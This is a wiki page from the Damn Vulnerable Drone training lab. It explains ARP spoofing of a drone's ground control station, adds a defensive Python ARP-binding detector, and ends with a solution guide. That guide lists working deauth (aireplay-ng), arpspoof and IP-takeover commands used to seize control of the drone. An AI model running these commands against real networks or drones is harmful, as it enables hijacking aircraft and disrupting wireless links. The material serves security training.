Ground Control Station Spoofing - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

ARP spoofing the Ground Control Station (GCS) to intercept and control communication between the drone and the GCS.


Description

ARP spoofing involves sending forged ARP (Address Resolution Protocol) messages on a network so that other hosts associate the attacker's MAC address with the IP address of the target device (the GCS in this case). This allows the attacker to intercept, modify, or block communication to the target device, effectively taking control of the drone's communication.

The goal of this attack is to impersonate the GCS by taking over its IP address after disconnecting the real GCS from the network. Once the attacker has assumed that address, they can interact directly with the drone using QGroundControl or MAVProxy.
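
What this takeover looks like from the defending side, as an added example (not code from the Damn Vulnerable Drone project): a passive check that parses ARP frames and alerts when the GCS address 192.168.13.14 used in the steps on this page is claimed by a different MAC. The MAC addresses and the three sample frames are constructed for the demonstration.

```python
import struct

GCS_IP = "192.168.13.14"          # GCS address used in the steps on this page
GCS_MAC = "02:00:00:00:00:14"     # constructed: MAC of the legitimate GCS
ARP_HDR = "08060001080006040002"  # EtherType ARP, Ethernet/IPv4, opcode 2 (reply)

# Constructed frames (hex): dst MAC, src MAC, ARP_HDR, sender MAC/IP, target MAC/IP.
SAMPLE_FRAMES = [
    "020000000001" "020000000014" + ARP_HDR + "020000000014" "c0a80d0e" "020000000001" "c0a80d01",  # real GCS
    "020000000014" "020000000001" + ARP_HDR + "020000000001" "c0a80d01" "020000000014" "c0a80d0e",  # 192.168.13.1
    "020000000001" "020000000066" + ARP_HDR + "020000000066" "c0a80d0e" "020000000001" "c0a80d01",  # new MAC claims GCS IP
]

def parse_arp(frame: bytes):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return oper, frame[22:28].hex(":"), ".".join(map(str, frame[28:32]))

class ArpWatch:
    """Track IP -> MAC bindings; pinned entries are authoritative, others are trust-on-first-use."""
    def __init__(self, pinned=None):
        self.pinned = dict(pinned or {})
        self.seen = {}

    def observe(self, frame: bytes):
        """Return an alert string when an IP is claimed by an unexpected MAC, else None."""
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        oper, mac, ip = parsed
        expected = self.pinned.get(ip, self.seen.get(ip))
        self.seen.setdefault(ip, mac)  # remember the first binding seen for unpinned IPs
        if expected is not None and mac != expected:
            return f"ALERT {ip} claimed by {mac}, expected {expected} (ARP op {oper})"
        return None

def demo():
    """Run the constructed frames through a watcher with the GCS binding pinned."""
    watch = ArpWatch(pinned={GCS_IP: GCS_MAC})
    return [watch.observe(bytes.fromhex(f)) for f in SAMPLE_FRAMES]

if __name__ == "__main__":
    for result in demo():
        print(result or "ok")
```

Pinning the GCS binding (or a static ARP entry for it on the drone side) is what turns the third frame into an alert instead of a silent table update.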

Resources


⚠️ Solution Guide

Step 1. Initialize the Drone

Power on the drone and ensure it is connected to its WiFi network.


Step 2. Break into the Drone Network

Use WiFi cracking techniques to access the network. See:


Step 3. Deauth the Legitimate GCS

Disconnect the real GCS from the network using a deauth attack:

sudo aireplay-ng --deauth 0 -a <AP_MAC> -c <GCS_MAC> wlan0mon

Step 4. Install QGroundControl (x86_64)

wget https://s3-us-west-2.amazonaws.com/qgroundcontrol/latest/QGroundControl.AppImage
chmod +x QGroundControl.AppImage
./QGroundControl.AppImage

Step 5. Install MAVProxy (ARM/Apple Silicon)

sudo pip install MAVProxy
mavproxy.py

Step 6. Note Your IP Address on the Network

ifconfig wlan0

Step 7. Perform ARP Spoofing

Impersonate the GCS by poisoning the ARP table of the drone:

sudo arpspoof -i wlan0 -t 192.168.13.14 -r 192.168.13.1

Step 8. Set Static GCS IP Address

nmcli connection modify "Drone_Wifi" ipv4.method manual \
ipv4.addresses 192.168.13.14/24 \
ipv4.gateway 192.168.13.1 \
ipv4.dns "8.8.8.8 8.8.4.4"

Step 9. Restart Network Connection

nmcli connection down "Drone_Wifi" && nmcli connection up "Drone_Wifi"

Step 10. Wait for Drone Connection

Once the GCS is spoofed and your machine has reconnected, the drone should attempt to link to your machine, which has now assumed the GCS role.


Step 11. Control the Drone via QGroundControl (x86_64)

  • Right-click → "Go To" position
  • Select "RTL" or "Land" from the mode dropdown

Step 12. Control the Drone via MAVProxy (ARM)

  • mode GUIDED
  • arm throttle
  • rtl, land, etc.

Step 13. Restore Original IP Configuration

nmcli connection modify "Drone_Wifi" ipv4.method manual \
ipv4.addresses 192.168.13.10/24 \
ipv4.gateway 192.168.13.1 \
ipv4.dns "8.8.8.8 8.8.4.4"

nmcli connection down "Drone_Wifi" && nmcli connection up "Drone_Wifi"
